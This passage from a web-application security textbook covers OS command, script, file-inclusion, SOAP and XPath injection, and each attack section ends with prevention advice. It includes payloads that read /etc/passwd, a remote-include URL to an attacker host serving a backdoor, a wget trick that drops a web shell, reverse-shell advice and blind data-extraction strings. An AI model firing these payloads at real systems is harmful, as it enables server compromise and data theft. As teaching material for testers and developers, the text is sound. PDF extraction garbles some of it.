software itself. In security-critical situations, database administrators can

Chapter 9 ■ Injecting Code 299

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 299

use various subscriber-based services to obtain advance notification of

some known vulnerabilities that have not yet been patched by the ven-

dor, and so can implement appropriate work-around measures in the

interim.

Injecting OS Commands

Most web server platforms have evolved to the point where built-in APIs exist

to perform practically any required interaction with the server’s operating sys-

tem. Properly used, these APIs can enable developers to access the file system,

interface with other processes, and carry out network communications in a

safe manner. Nevertheless, there are many situations where developers elect to

use the more heavyweight technique of issuing operating system commands

directly to the server. This option can be attractive because of its power and

simplicity, and often provides an immediate and functional solution to a par-

ticular problem. However, if the application passes user-supplied input to

operating system commands, then it may well be vulnerable to command

injection, enabling an attacker to submit crafted input that modifies the com-

mands that the developers intended to perform.

The functions commonly used to issue operating system commands, such as

exec in PHP and wscript.shell in ASP, do not impose any restriction on the

scope of commands that may be performed. Even if a developer intends to use

an API to perform a relatively benign task such as listing a directory’s con-

tents, an attacker may be able to subvert it to write arbitrary files or launch

other programs. Any injected commands will normally run in the security con-

text of the web server process, which will often be sufficiently powerful for an

attacker to compromise the entire server.

Command injection flaws of this kind have arisen in numerous off-the-shelf

and custom-built web applications. They have been particularly prevalent

within applications that provide an administrative interface to an enterprise

server or to devices such as firewalls, printers, and routers. These applications

often have particular requirements for operating system interaction that lead

developers to use direct commands which incorporate user-supplied data.

Example 1: Injecting via Perl

Consider the following Perl CGI code, which is part of a web application for

server administration. This function allows administrators to specify a direc-

tory on the server, and view a summary of its disk usage:

#!/usr/bin/perl

use strict;

300 Chapter 9 ■ Injecting Code

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 300

use CGI qw(:standard escapeHTML);

print header, start_html(“”);

print “<pre>”;

my $command = “du -h --exclude php* /var/www/html”;

$command= $command.param(“dir”);

$command=`$command`;

print “$command\n”;

print end_html;

When used as intended, this script simply appends the value of the user-

supplied

dir parameter to the end of a preset command, executes the com-

mand, and displays the results, as shown in Figure 9-3.

Figure 9-3: A simple application function for listing a directory’s contents

This functionality can be exploited in various ways, by supplying crafted

input containing shell metacharacters. These characters have a special mean-

ing to the interpreter that processes the command and can be used to interfere

with the command that the developer intended to execute. For example, the

pipe character

| is used to redirect the output from one process into the input

of another, enabling multiple commands to be chained together. An attacker

can leverage this behavior to inject a second command and retrieve its output,

as shown in Figure 9-4.

Chapter 9 ■ Injecting Code 301

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 301

Figure 9-4: A successful command injection attack

Here, the output from the original du command has been redirected as the

input to the command

cat /etc/passwd. This command simply ignores the

input and performs its sole task of outputting the contents of the

passwd file.

An attack as simple as this may appear improbable; however, exactly this

type of command injection has been found in numerous commercial products.

For example, HP Openview was found to be vulnerable to a command injec-

tion flaw within the following URL:

https://target:3443/OvCgi/connectedNodes.ovpl?node=a| [your command] |

Example 2: Injecting via ASP

Consider the following ASP code, which is part of a web application for

administering a web server. The function allows administrators to view the

contents of a requested log file:

Set oScript = Server.CreateObject(“WSCRIPT.SHELL”)

Set oFileSys = Server.CreateObject(“Scripting.FileSystemObject”)

szCMD = “type c:\inetpub\wwwroot\logs\“ & Request.Form(“FileName”)

szTempFile = “C:\“ & oFileSys.GetTempName()

Call oScript.Run (“cmd.exe /c “ & szCMD & “ > “ & szTempFile,

0, True)

Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)

302 Chapter 9 ■ Injecting Code

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 302

When used as intended, this script inserts the value of the user-supplied

FileName parameter into a preset command, executes the command, and dis-

plays the results, as shown in Figure 9-5.

Figure 9-5: A function to display the contents of a log file

As with the vulnerable Perl script, an attacker can use shell metacharacters

to interfere with the preset command intended by the developer, and inject his

own command. The ampersand character (

&) is used to batch multiple com-

mands together. Supplying a filename containing the ampersand character

and a second command causes this command to be executed and its results

displayed, as shown in Figure 9-6.

Figure 9-6: A successful command injection attack

Chapter 9 ■ Injecting Code 303

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 303

Finding OS Command Injection Flaws

In your application mapping exercises (see Chapter 4), you should already

have identified any instances where the web application appears to be inter-

acting with the underlying operating system, by calling out to external

processes or accessing the file system. You should probe all of these functions

looking for command injection flaws. In fact, however, the application may

issue operating system commands containing absolutely any item of user-

supplied data, including every URL and body parameter and every cookie. To

perform a thorough test of the application, you therefore need to target all

these items within every application function.

Different command interpreters handle shell metacharacters in different

ways. In principle, any type of application development platform or web server

may call out to any kind of shell interpreter, running either on its own operating

system or that of any other host. You should not therefore make any assump-

tions about the application’s handling of metacharacters based on any knowl-

edge of the web server’s operating system.

There are two broad types of metacharacter that may be used to inject a sep-

arate command into an existing preset command:

■■

The characters ; | & and newline may be used to batch multiple com-

mands together, one after the other. In some cases, these characters may

be doubled up with different effects. For example in the Windows com-

mand interpreter, using

&& will cause the second command to run only

if the first is successful. Using

|| will cause the second command to

always run, regardless of the success of the first.

■■

The backtick character (`) can be used to encapsulate a separate com-

mand within a data item being processed by the original command, as

in the example given at the beginning of this chapter. Placing an injected

command within backticks will cause the shell interpreter to execute the

command and replace the encapsulated text with the results of this com-

mand, before continuing to execute the resulting command string.

In the previous examples, it was straightforward to verify that command

injection was possible, and to retrieve the results of the injected command,

because those results were returned immediately within the application’s

response. In many cases, however, this may not be possible. You may be inject-

ing into a command that returns no results and which does not affect the appli-

cation’s subsequent processing in any identifiable way. Or the method you

have used to inject your chosen command may be such that its results are lost

as multiple commands are batched together.

The most reliable way in general to detect whether command injection is

possible is to use time-delay inference in a similar way as was described for

exploiting blind SQL injection. If a potential vulnerability appears to exist, you

can then use other methods to confirm this and to retrieve the results of your

injected commands.

304 Chapter 9 ■ Injecting Code

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 304

HACK STEPS

■ You can normally use the ping command as a means of triggering a time

delay, by causing the server to ping its loopback interface for a specific

period. There are minor differences between the way Windows and Unix-

based platforms handle command separators and the ping command,

but the following all-purpose test string should induce a 30-second time

delay on either platform if no filtering is in place:

|| ping -i 30 127.0.0.1 ; x || ping -n 30 127.0.0.1 &

To maximize your chances of detecting a command injection flaw if the

application is filtering certain command separators, you should also submit

each of the following test strings to each targeted parameter in turn, and

monitor the time taken for the application to respond:

| ping –i 30 127.0.0.1 |

| ping –n 30 127.0.0.1 |

& ping –i 30 127.0.0.1 &

& ping –n 30 127.0.0.1 &

; ping 127.0.0.1 ;

%0a ping –i 30 127.0.0.1 %0a

` ping 127.0.0.1 `

■ If a time delay occurs, then the application may be vulnerable to com-

mand injection. Repeat the test case several times to confirm that the

delay was not the result of network latency or other anomalies. You can

try changing the value of the -n or -i parameters, and confirming that

the delay experienced varies systematically with the value supplied.

■ Using whichever of the injection strings was found to be successful, try

injecting a more interesting command (such as ls or dir), and deter-

mine whether you are able to retrieve the results of the command back

to your browser.

■ If you are unable to retrieve results directly, there are other options open

to you:

■

You can attempt to open an out-of-band channel back to your com-

puter. Try using TFTP to copy tools up to the server, using telnet or net-

cat to create a reverse shell back to your computer, and using the

mail command to send command output via SMTP.

■

You can redirect the results of your commands to a file within the web

root, which you can then retrieve directly using your browser. For

example:

dir > c:\inetpub\wwwroot\foo.txt

Continued

Chapter 9 ■ Injecting Code 305

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 305

306 Chapter 9 ■ Injecting Code

HACK STEPS (continued)

■ Once you have found a means of injecting commands and retrieving the

results, you should determine your privilege level (by using whoami or

something similar, or attempting to write a harmless file to a protected

directory). You may then seek to escalate privileges, gain backdoor

access to sensitive application data, or attack other hosts reachable from

the compromised server.

In some cases, it may not be possible to inject an entirely separate command,

due to filtering of required characters, or the behavior of the command API

being used by the application. Nevertheless, it may still be possible to interfere

with the behavior of the command being performed, to achieve some desired

result.

HACK STEPS

■ The < and > characters are used respectively to direct the contents of a

file to the command’s input and to direct the command’s output to a file.

If it is not possible to use the preceding techniques to inject an entirely

separate command, you may still be able to read and write arbitrary file

contents using the < and > characters.

■ Many operating system commands which applications invoke accept a

number of command-line parameters that control their behavior. Often,

user-supplied input is passed to the command as one of these parame-

ters, and you may be able to add further parameters simply by inserting a

space followed by the relevant parameter. For example, a web authoring

application may contain a function in which the server retrieves a user-

specified URL and renders its contents in-browser for editing. If the

application simply calls out to the wget program, then you may be able

to write arbitrary file contents to the server’s file system by appending

the -O command-line parameter used by wget. For example:

url=http://wahh-attacker.com/%20-O%20c:\inetpub\wwwroot\

scripts\cmdasp.asp

TIP Many command injection attacks require you to inject spaces to separate

command-line arguments. If you find that spaces are being filtered by the

application, and the platform you are attacking is Unix-based, you may be able

to use the $IFS environment variable instead, which contains the whitespace

field separators.

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 306

Preventing OS Command Injection

In general, the best way to prevent OS command injection flaws from arising

is to avoid calling out directly to operating system commands at all. Virtually

any conceivable task that a web application may need to carry out can be

achieved using built-in APIs that cannot be manipulated to perform additional

commands than the one intended.

If it is considered unavoidable to embed user-supplied data into command

strings that are passed to an operating system command interpreter, the appli-

cation should enforce rigorous defenses to prevent a vulnerability arising. If

possible, a white list should be used to restrict user input to a specific set of

expected values. Alternatively, the input should be restricted to a very narrow

character set — for example, alphanumeric characters only. Input containing

any other data, including any conceivable metacharacter or whitespace should

be rejected.

As a further layer of protection, the application should use command APIs

that launch a specific process via its name and command-line parameters,

rather than passing a command string to a shell interpreter that supports com-

mand chaining and redirection. For example, the Java API

Runtime.exec and

the ASP.NET API

Process.Start do not support shell metacharacters and if

properly used can ensure that only the command intended by the developer

will be executed. See Chapter 18 for more details of command execution APIs.

Injecting into Web Scripting Languages

The core logic of most web applications is written in interpreted scripting lan-

guages like PHP, VBScript, and Perl. In addition to the possibilities for inject-

ing into languages used by other back-end components, a key area of

vulnerability concerns injection into the core application code itself. Exposure

to this type of attack arises from two main sources:

■■

Dynamic execution of code that incorporates user-supplied data.

■■

Dynamic inclusion of code files specified on the basis of user-

supplied data.

We will look at each of these vulnerabilities in turn.

Dynamic Execution Vulnerabilities

Many web scripting languages support the dynamic execution of code that is

generated at runtime. This feature enables developers to create applications

that dynamically modify their own code in response to various data and con-

ditions. If user input is incorporated into code that is dynamically executed,

Chapter 9 ■ Injecting Code 307

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 307

then an attacker may be able to supply crafted input that breaks out of the

intended data context and specifies commands that are executed on the server

in the same way as if they had been written by the original developer. Because

most scripting languages contain powerful APIs that may be used to access the

underlying operating system, code injection into the web application often

leads to a compromise of the entire server.

Dynamic Execution in PHP

The PHP function eval is used to dynamically execute code that is passed to the

function at runtime. Consider a search function that enables users to create stored

searches that are then dynamically generated as links within their user interface.

When users access the search function, they use a URL like the following:

https://wahh-app.com/search.php?storedsearch=\$mysearch%3dwahh

The server-side application implements this functionality by dynamically gen-

erating variables containing the name/value pairs specified in the

storedsearch

parameter, in this case creating a mysearch variable with the value wahh:

$storedsearch = $_GET[‘storedsearch’];

eval(“$storedsearch;”);

In this situation, you can submit crafted input that is dynamically executed

by the

eval function, resulting in injection of arbitrary PHP commands into

the server-side application. The semicolon character can be used to batch com-

mands together in a single parameter. For example, to retrieve the contents of

the file

/etc/password, you could use either the file_get_contents or the

system command:

https://wahh-app.com/search.php?storedsearch=\$mysearch%3dwahh;

%20echo%20file_get_contents(‘/etc/passwd’)

https://wahh-app.com/search.php?storedsearch=\$mysearch%3dwahh;

%20system(‘cat%20/etc/passwd’)

NOTE The Perl language also contains an eval function that can be exploited

in the same way. Note that the semicolon character may need to be URL-encoded

(as %3b) as some CGI script parsers interpret this as a parameter delimiter.

Dynamic Execution in ASP

The ASP function Execute works in the same way as the PHP eval function

and can be used to dynamically execute code that is passed to the function at

runtime.

308 Chapter 9 ■ Injecting Code

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 308

The functionality described for the PHP application above could be imple-

mented in ASP as follows:

dim storedsearch

storedsearch = Request(“storedsearch”)

Execute(storedsearch)

In this situation, an attacker can submit crafted input which results in injec-

tion of arbitrary ASP commands. In ASP, commands are normally delimited

using newline characters, but multiple commands can be batched when

passed to the

Execute function using the colon character. For example,

response.write can be used to print arbitrary data into the server’s response:

https://wahh-app.com/search.asp?storedsearch=mysearch%3dwahh:

response.write%20111111111

The Wscript.Shell object can be used to access the operating system com-

mand shell. For example, the following ASP will perform a directory listing

and store the results in a file within the web root:

Dim oScript

Set oScript = Server.CreateObject(“WSCRIPT.SHELL”)

Call oScript.Run (“cmd.exe /c dir > c:\inetpub\wwwroot\dir.txt”,0,True)

This code can be passed to the vulnerable call to Execute by batching all of

the commands as follows:

https://wahh-app.com/search.asp?storedsearch=mysearch%3dwahh:+

Dim +oScript:+Set+oScript+=+Server.CreateObject(“WSCRIPT.SHELL”):+

Call+oScript.Run+(“cmd.exe+/c+dir+>+c:\inetpub\wwwroot\dir.txt”,0,True)

Finding Dynamic Execution Vulnerabilities

Most web scripting languages support dynamic execution, and the functions

involved all work in a similar way. Therefore, dynamic execution vulnerabili-

ties can in general be detected using a relatively small set of attack strings that

work on multiple languages and platforms. However, in some cases it may be

necessary to research the syntax and behavior of the particular implementa-

tion you are dealing with. For example, although Java does not itself support

dynamic execution, some custom implementations of the JSP platform may do

so. You should use the information gathered during your application mapping

exercises to investigate any unusual execution environments you encounter.

Chapter 9 ■ Injecting Code 309

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 309

310 Chapter 9 ■ Injecting Code

HACK STEPS

■ Any item of user-supplied data may be passed to a dynamic execution

function. Some of the items most commonly used in this way are the

names and values of cookie parameters, and persistent data stored in

user profiles as the result of previous actions.

■ Try submitting the following values in turn as each targeted parameter:

;echo%20111111

echo%20111111

response.write%20111111

:response.write%20111111

■ Review the application’s responses. If the string 111111 is returned on

its own (i.e., not preceded by the rest of the command string), then the

application is likely to be vulnerable to injection of scripting commands.

■ If the string 111111 is not returned, look for any error messages that

indicate that your input is being dynamically executed and that you may

need to fine-tune your syntax to achieve injection of arbitrary commands.

■ If the application you are attacking uses PHP, you can use the test string

phpinfo(), which if successful will return the configuration details of

the PHP environment.

■ If the application appears to be vulnerable, verify this by injecting some

commands that result in time delays, as described previously for OS com-

mand injection. For example:

system(‘ping%20127.0.0.1’)

File Inclusion Vulnerabilities

Many scripting languages support the use of include files. This facility enables

developers to place reusable code components into individual files, and to

include these within function-specific code files as and when they are needed.

The code within the included file is interpreted just as if it had been inserted at

the location of the include directive.

Remote File Inclusion

The PHP language is particularly susceptible to file inclusion vulnerabilities

because its include function accepts a remote file path. This has been the basis

of numerous vulnerabilities in PHP applications.

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 310

Consider an application that delivers different content to people in different

locations. When users choose their location, this is communicated to the server

via a request parameter, as follows:

https://wahh-app.com/main.php?Country=US

The application processes the Country parameter as follows:

$country = $_GET[‘Country’];

include( $country . ‘.php’ );

This causes the execution environment to load the file US.php that is located

on the web server file system. The contents of this file are effectively copied

into the

main.php file, and executed.

An attacker can exploit this behavior in different ways, the most serious of

which is to specify an external URL as the location of the include file. The PHP

include function accepts this as input, and the execution environment will

retrieve the specified file and execute its contents. Hence, an attacker can con-

struct a malicious script containing arbitrarily complex content, host this on a

web server he controls, and invoke it for execution via the vulnerable applica-

tion function. For example:

https://wahh-app.com/main.php?Country=http://wahh-attacker.com/backdoor

Local File Inclusion

In some cases, include files are loaded on the basis of user-controllable data,

but it is not possible to specify a URL to a file on an external server. For exam-

ple, if user-controllable data is passed to the ASP function

Server.Execute,

then an attacker may be able to cause an arbitrary ASP script to be executed,

provided that this script belongs to the same application as the one that is call-

ing the function.

In this situation, you may still be able to exploit the application’s behavior to

perform unauthorized actions:

■■

There may be server-executable files on the server that you cannot

access through the normal route — for example, any requests to the

path

/admin may be blocked through application-wide access controls.

If you can cause sensitive functionality to be included into a page that

you are authorized to access, then you may be able to gain access to

that functionality.

■■

There may be static resources on the server that are similarly protected

from direct access. If you can cause these to be dynamically included

into other application pages, then the execution environment will typi-

cally simply copy the contents of the static resource into its response.

Chapter 9 ■ Injecting Code 311

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 311

312 Chapter 9 ■ Injecting Code

Finding File Inclusion Vulnerabilities

File inclusion vulnerabilities may arise in relation to any item of user-supplied

data. They are particularly common in request parameters that specify a lan-

guage or location, and also often arise when the name of a server-side file is

passed explicitly as a parameter.

HACK STEPS

To test for remote file inclusion flaws, perform the following steps:

■ Submit in each targeted parameter a URL for a resource on a web server

that you control, and determine whether any requests are received from

the server hosting the target application.

■ If the first test fails, try submitting a URL containing a nonexistent IP

address, and determine whether a timeout occurs while the server

attempts to connect.

■ If the application is found to be vulnerable to remote file inclusion, con-

struct a malicious script using the available APIs in the relevant lan-

guage, as described for dynamic execution attacks.

Local file inclusion vulnerabilities can potentially exist in a much wider range

of scripting environments than those that support remote file inclusion. To test

for local file inclusion vulnerabilities, perform the following steps:

■ Submit the name of a known executable resource on the server, and

determine whether there is any change in the application’s behavior.

■ Submit the name of a known static resource on the server, and determine

whether its contents are copied into the application’s response.

■ If the application is vulnerable to local file inclusion, attempt to access

any sensitive functionality or resources that you cannot reach directly via

the web server.

Preventing Script Injection Vulnerabilities

In general, the best way to avoid script injection vulnerabilities is to not pass

user-supplied input, or data derived from it, into any dynamic execution or

include functions. If this is considered to be unavoidable for some reason, then

the relevant input should be strictly validated to prevent any attack occurring.

If possible, use a white list of known good values (such as a list of all the lan-

guages or locations supported by the application), and reject any input that

does not appear on this list. Failing that, check the characters used within the

input against a set known to be harmless, such as alphanumeric characters

excluding whitespace.

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 312

Injecting into SOAP

The Simple Object Access Protocol (SOAP) is a message-based communica-

tions technology that uses the XML format to encapsulate data. It can be used

to share information and transmit messages between systems, even if these

run on different operating systems and architectures. Its primary use is in web

services, and in the context of a browser-accessed web application, you are

most likely to encounter SOAP in the communications that occur between

back-end application components.

SOAP is often used in large-scale enterprise applications where individual

tasks are performed by different computers to improve performance. It is also

often found where a web application has been deployed as a front end to an

existing application. In this situation, communications between different

components may be implemented using SOAP to ensure modularity and

interoperability.

Because XML is an interpreted language, SOAP is potentially vulnerable to

code injection in a similar way as the other examples already described. XML

elements are represented syntactically, using the metacharacters

< > and /. If

user-supplied data containing these characters is inserted directly into a SOAP

message, an attacker may be able to interfere with the structure of the message

and so interfere with the application’s logic or cause other undesirable effects.

Consider a banking application in which a user initiates a funds transfer

using an HTTP request like the following:

POST /transfer.asp HTTP/1.0

Host: wahh-bank.com

Content-Length: 65

FromAccount=18281008&Amount=1430&ToAccount=08447656&Submit=Submit

In the course of processing this request, the following SOAP message is sent

between two of the application’s back-end components:

<soap:Envelope xmlns:soap=”http://www.w3.org/2001/12/soap-envelope”>

<soap:Body>

<pre:Add xmlns:pre=http://target/lists soap:encodingStyle=

”http://www.w3.org/2001/12/soap-encoding”>

<ClearedFunds>False</ClearedFunds>

</Account>

</pre:Add>

</soap:Body>

</soap:Envelope>

Chapter 9 ■ Injecting Code 313

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 313

314 Chapter 9 ■ Injecting Code

Note how the XML elements in the message correspond to the parameters in

the HTTP request, and also the addition of the

ClearedFunds element. At this

point in the application’s logic, it has determined that there are insufficient

funds available to perform the requested transfer, and has set the value of this

element to

False, with the result that the component which receives the SOAP

message does not act upon it.

In this situation, there are various ways in which you could seek to inject

into the SOAP message, and so interfere with the application’s logic. For exam-

ple, submitting the following request will cause an additional

ClearedFunds

element to be inserted into the message before the original element (while pre-

serving the SQL’s syntactic validity). If the application processes the first

ClearedFunds element that it encounters, then you may succeed in performing

a transfer when no funds are available:

POST /transfer.asp HTTP/1.0

Host: wahh-bank.com

Content-Length: 119

FromAccount=18281008&Amount=1430</Amount><ClearedFunds>True

</ClearedFunds><Amount>1430&ToAccount=08447656&Submit=Submit

If, on the other hand, the application processes the last ClearedFunds ele-

ment that it encounters, you could inject a similar attack into the

ToAccount

parameter.

A different type of attack would be to use XML comments to remove part of

the original SOAP message altogether, and replace the removed elements with

your own. For example, the following request injects a

ClearedFunds element

via the

Amount parameter, provides the opening tag for the ToAccount element,

opens a comment, and closes the comment in the

ToAccount parameter, thus

preserving the syntactic validity of the XML:

POST /transfer.asp HTTP/1.0

Host: wahh-bank.com

Content-Length: 125

FromAccount=18281008&Amount=1430</Amount><ClearedFunds>True

</ClearedFunds><ToAccount>08447656&Submit=Submit

A further type of attack would be to attempt to complete the entire SOAP

message from within an injected parameter and comment out the remainder of

the message. However, because the opening comment will not be matched by

a closing comment, this attack produces strictly invalid XML, which will be

rejected by many XML parsers:

POST /transfer.asp HTTP/1.0

Host: wahh-bank.com

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 314

Content-Length: 176

FromAccount=18281008&Amount=1430</Amount><ClearedFunds>True</ClearedFund

s><ToAccount>08447656</ToAccount></Account></pre:Add></soap:Body></soap:

Envelope><!--&Submit=Submit

Finding and Exploiting SOAP Injection

SOAP injection can be difficult to detect, because supplying XML metacharac-

ters in a noncrafted way will break the format of the SOAP message, and this

will often simply result in an uninformative error message. Nevertheless, the

following steps can be used to detect SOAP injection vulnerabilities with a

degree of reliability.

HACK STEPS

■ Submit a rogue XML closing tag such as </foo> in each parameter in

turn. If no error occurs, your input is probably not being inserted into a

SOAP message, or is being sanitized in some way.

■ If an error was received, submit instead a valid opening and closing tag

pair, such as <foo></foo>. If this causes the error to disappear, then the

application may well be vulnerable.

■ In some situations, data that is inserted into an XML-formatted message

is subsequently read back from its XML form and returned to the user. If

the item you are modifying is being returned in the application’s

responses, see whether any XML content you submit is returned in its

identical form, or has been normalized in some way. Submit the follow-

ing two values in turn:

test<foo/>

test<foo></foo>

If you find that either item is returned as the other, or simply as test, then

you can be confident that your input is being inserted into an XML-based

message.

■ If the HTTP request contains several parameters which may be being

placed into a SOAP message, try inserting the opening comment charac-

ter

into another parameter. Then, switch these around (because you have no

way of knowing which order the parameters appear in). This can have the

effect of commenting out a portion of the server’s SOAP message, which

may cause a change in the application’s logic, or result in a different

error condition which may divulge information.

Chapter 9 ■ Injecting Code 315

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 315

If SOAP injection is difficult to detect, then it can be even harder to exploit.

In most situations, you will need to know the structure of the XML that sur-

rounds your data, in order to supply crafted input which modifies the message

without invalidating it. In all of the preceding tests, look for any error mes-

sages that reveal any details about the SOAP message being processed. If you

are lucky, a verbose message will disclose the entire message, enabling you to

construct crafted values to exploit the vulnerability. If you are unlucky, you

may be restricted to pure guesswork, which is very unlikely to be successful.

Preventing SOAP Injection

SOAP injection can be prevented by employing boundary validation filters at

any point where user-supplied data is inserted into a SOAP message (see

Chapter 2). This should be performed both on data that has been immediately

received from the user in the current request and on any data which has been

persisted from earlier requests or generated from other processing that takes

user data as input.

To prevent the attacks described, the application should HTML-encode any

XML metacharacters appearing in user input. HTML-encoding involves

replacing literal characters with their corresponding HTML entities. This

ensures that the XML interpreter will treat them as part of the data value of the

relevant element, and not as part of the structure of the message itself. The

HTML-encodings of some common problematic characters are:

< <

> >

/ /

Injecting into XPath

The XML Path Language (or XPath) is an interpreted language used for navi-

gating around XML documents, and for retrieving data from within them. In

most cases, an XPath expression represents a sequence of steps that is required

to navigate from one node of a document to another.

Where web applications store data within XML documents, they may use

XPath to access the data in response to user-supplied input. If this input is

inserted into the XPath query without any filtering or sanitization, then an

attacker may be able to manipulate the query to interfere with the applica-

tion’s logic or retrieve data for which she is not authorized.

XML documents are not generally a preferred vehicle for storing enterprise

data. However, they are frequently used to store application configuration

data that may be retrieved on the basis of user input. They may also be used by

316 Chapter 9 ■ Injecting Code

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 316

smaller applications to persist simple information such as user credentials,

roles, and privileges.

Consider the following XML data store:

<firstName>William</firstName>

<surname>Gates</surname>

<password>MSRocks!</password>

<email>[email protected]</email>

</address>

<firstName>Chris</firstName>

<surname>Dawes</surname>

<password>secret</password>

<email>[email protected]</email>

</address>

<firstName>James</firstName>

<surname>Hunter</surname>

<password>letmein</password>

<email>[email protected]</email>

</address>

</addressBook>

An XPath query to retrieve all email addresses would look like the following:

//address/email/text()

A query to return all of the details of the user Dawes would be:

//address[surname/text()=’Dawes’]

In some applications, user-supplied data may be embedded directly into

XPath queries, and the results of the query may be returned in the applica-

tion’s response or used to determine some aspect of the application’s behavior.

Subverting Application Logic

Consider an application function that retrieves a user’s stored credit card

number based on a username and password. The following XPath query effec-

tively verifies the user-supplied credentials and retrieves the relevant user’s

credit card number:

//address[surname/text()=’Dawes’ and password/text()=’secret’]/ccard/

text()

Chapter 9 ■ Injecting Code 317

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 317

In this case, an attacker may be able to subvert the application’s query in an

identical way to a SQL injection flaw. For example, supplying a password with

the value

‘ or ‘a’=’a

will result in the following XPath query, which will retrieve the credit card

details of all users:

//address[surname/text()=’Dawes’ and password/text()=’‘ or ‘a’=’a’]/

ccard/text()

NOTE

■■

As with SQL injection, single quotation marks are not required when

injecting into a numeric value.

■■

Unlike SQL queries, keywords in XPath queries are case sensitive, as

are the element names in the XML document itself.

Informed XPath Injection

XPath injection flaws can be exploited to retrieve arbitrary information from

within the target XML document. One reliable way of doing this uses the same

technique as was described for SQL injection, of causing the application to

respond in different ways contingent upon a condition specified by the

attacker.

Submitting the following two passwords will result in different behavior by

the application — results will be returned in the first case but not in the second:

‘ or 1=1 and ‘a’=’a

‘ or 1=2 and ‘a’=’a

This difference in behavior can be leveraged to test the truth of any specified

condition and, therefore, extract arbitrary information one byte at a time. As

with SQL, the XPath language contains a substring function, which can be

used to test the value of a string one character at a time. For example, supply-

ing the password

‘ or //address[surname/text()=’Gates’ and substring(password/

text(),1,1)=’M’] and ‘a’=’a

will result in the following XPath query, which will return results if the first

character of the Gates user’s password is

//address[surname/text()=’Dawes’ and password/text()=’‘ or

//address[surname/text()=’Gates’ and substring(password/text(),1,1)=’M’]

and ‘a’=’a’]/ccard/text()

318 Chapter 9 ■ Injecting Code

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 318

By cycling through each character position, and testing each possible value,

an attacker can extract the full value of Gates’s password.

Blind XPath Injection

In the attack just described, the injected test condition specified both the

absolute path to the extracted data (

address) and the names of the targeted

fields (

surname and password). In fact, it is possible to mount a fully blind

attack without possessing this information. XPath queries can contain steps

that are relative to the current node within the XML document, so from the

current node it is possible to navigate to the parent node or to a specific child

node. Further, XPath contains functions to query meta-information about the

document, including the name of a specific element. Using these techniques, it

is possible to extract the names and values of all nodes within the document

without knowing any prior information about its structure or contents.

For example, you can use the substring technique described previously to

extract the name of the current node’s parent, by supplying a series of pass-

words of the form:

‘ or substring(name(parent::*[position()=1]),1,1)=’a

This input generates results, because the first letter of the address node is a.

Moving on to the second letter, you can confirm that this is

d by supplying the

following passwords, the last of which generates results:

‘ or substring(name(parent::*[position()=1]),2,1)=’a

‘ or substring(name(parent::*[position()=1]),2,1)=’b

‘ or substring(name(parent::*[position()=1]),2,1)=’c

‘ or substring(name(parent::*[position()=1]),2,1)=’d

Having established the name of the address node, you can then cycle

through each of its child nodes, extracting all of their names and values. Spec-

ifying the relevant child node by index avoids the need to know the names of

any nodes. For example, the following query will return the value

Hunter:

//address[position()=3]/child::node()[position()=4]/text()

And the following query will return the value letmein:

//address[position()=3]/child::node()[position()=6]/text()

This technique can be used in a completely blind attack, where no results are

returned within the application’s responses, by crafting an injected condition

that specifies the target node by index. For example, supplying the following

password will return results if the first character of Gates’s password is

‘ or substring(//address[position()=1]/child::node()[position()=6]/

text(),1,1)=’M’ and ‘a’=’a

Chapter 9 ■ Injecting Code 319

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 319

By cycling through every child node of every address node, and extracting

their values one character at a time, you can extract the entire contents of the

XML data store.

TIP XPath contains two useful functions that can help you automate the

above attack and quickly iterate through all nodes and data in the XML

document:

■■

count() — This returns the number of child nodes of a given element,

which can be used to determine the range of position() values to

iterate over.

■■

string-length() — This returns the length of a supplied string,

which can be used to determine the range of substring() values to

iterate over.

Finding XPath Injection Flaws

Many of the attack strings that are commonly used to probe for SQL injection

flaws will typically result in anomalous behavior when submitted to a func-

tion that is vulnerable to XPath injection. For example, either of the following

two strings will normally invalidate the XPath query syntax and so generate

an error:

‘

‘--

One or more of the following strings will typically result in some change in

the application’s behavior without causing an error, in the same way as they

do in relation to SQL injection flaws:

‘ or ‘a’=’a

‘ and ‘a’=’b

or 1=1

and 1=2

Hence, in any situation where your tests for SQL injection provide tentative

evidence for a vulnerability, but you are unable to conclusively exploit the

flaw, you should investigate the possibility that you are dealing with an XPath

injection flaw.

320 Chapter 9 ■ Injecting Code

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 320

Chapter 9 ■ Injecting Code 321

HACK STEPS

■ Try submitting the following values, and determine whether these result

in different application behavior, without causing an error:

‘ or count(parent::*[position()=1])=0 or ‘a’=’b

‘ or count(parent::*[position()=1])>0 or ‘a’=’b

■ If the parameter is numeric, also try the following test strings:

1 or count(parent::*[position()=1])=0

1 or count(parent::*[position()=1])>0

■ If any of the preceding strings causes differential behavior within the

application without causing an error, it is likely that you can extract arbi-

trary data by crafting test conditions to extract one byte of information at

a time. Use a series of conditions with the following form to determine

the name of the current node’s parent:

substring(name(parent::*[position()=1]),1,1)=’a’

■ Having extracted the name of the parent node, use a series of conditions

with the following form to extract all of the data within the XML tree:

substring(//parentnodename[position()=1]/child::node()

[position()=1]/text(),1,1)=’a’

Preventing XPath Injection

If it is felt necessary to insert user-supplied input into an XPath query, this

operation should only be performed on simple items of data which can be sub-

jected to strict input validation. The user input should be checked against a

white list of acceptable characters, which should ideally include only alphanu-

meric characters. Characters that may be used to interfere with the XPath

query should be blocked, including

( ) = ‘ [ ] : , * / and all whitespace.

